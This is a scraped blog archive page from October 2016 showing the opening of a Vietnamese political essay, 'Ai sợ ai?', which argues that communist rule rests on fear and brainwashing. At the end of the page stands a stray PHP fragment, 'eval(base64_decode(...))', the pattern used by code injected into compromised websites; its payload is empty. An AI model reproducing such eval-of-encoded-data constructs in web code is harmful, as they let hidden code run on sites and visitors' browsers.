Archive for October 3rd, 2016

Ai sợ ai?

Ai sợ ai?

Phần đông các nhà nghiên cứu về chủ nghĩa Cộng Sản đồng ý chế độ CS tồn tại nhờ vào cơ chế toàn trị trong đó hai phương pháp được áp dụng song song gồm bạo lực làm cho con người sợ hãi và tẩy não làm cho nhận thức con người

10.3.2016 | Tiểu Luận- Chính Luận |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>